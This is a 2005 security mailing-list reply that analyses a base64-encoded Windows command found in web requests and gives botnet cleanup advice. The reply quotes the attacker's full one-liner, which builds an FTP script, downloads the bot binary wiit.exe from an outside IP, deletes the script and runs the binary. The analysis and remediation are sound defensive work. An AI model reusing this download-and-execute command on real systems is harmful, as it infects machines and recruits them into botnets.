[Dshield] Anyone seen wiit.exe?
jayjwa at atr2.ath.cx
Tue Aug 30 07:42:55 GMT 2005
On Mon, 29 Aug 2005, bgreenwood wrote:
-> Over about the past two weeks or so I have noticed the following
being base64 encoded in the URI of some incoming requests to my site...
Are you running IIS, by chance?
-> cmd /k echo open 126.96.36.199 17113 > o&echo user 1 1 >> o &echo
get wiit.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &wiit.exe
This command is calling the interpreter to create an ftp script that is
then fed into into ftp.exe. Script "o" Looks like this:
open 188.8.131.52 17113
user 1 1
That script that downloads from the attacker, in this case 184.108.40.206
at port 17113, from a bot ftp server the bot binary, in this case
"wiit.exe". The last command feeds the script to ftp.exe, quitely deletes
it, and runs it.
ftp -n -s:o downloads it
& del /F /Q o deletes it
& wiit.exe runs what just got downloaded
-> I have seen this activity before but with different filenames being
called out. I don't recall seeing the wiit.exe or know exactly what
it is supposed to be doing. Has anyone seen this or know what
it is supposed to be doing once executed?
C:\Windows\System32 (depending on the case of the OS)
and another reference to the file in HKLM of the registry, Run, RunOnce
and/or RunServices. There's a few others on some.
These are the download & exec commands that are sent from the attacking
machine to the new victim machine once successful exploitation has
occured. You more than likely have alot of irc-bot infected machines
and/or a totally compromised network, depending on how many of your
machines are doing this/taking these requests. Someone is then sitting in
an IRC channel somewhere, using these machines to DDoS, send SPAM, infect
other people's machines, harvest emails, Windows CD keys, run SOCKS4/5
Note where the machines are connecting to. Record the IP, whois and
contact point for the host(s) in question.
Shutdown the machine, boot from a clean disk to safemode or another OS
like linux and mount the disk (that is, do not let the Registery stuff
execute, as little as possible should run. If the process does start that
you think is the bot, task kill it.) Remove the referenced file. Remove
all mentions of the file from the registery. Make sure that "System
Restore" is diabled during this. You might need to repair the hosts file.
Patch the system, firewall off the known bot/exploit ports, and IMHO
swap IIS for Apache and restart. Repeat for each machine.
Mail the contact point for the server you recorded and tell him about his
botnet. If you're feeling adventuresome, follow the path of the bots back
to the server and see if you can get into the bot channel and learn
anything about the botmaster.
More information about the list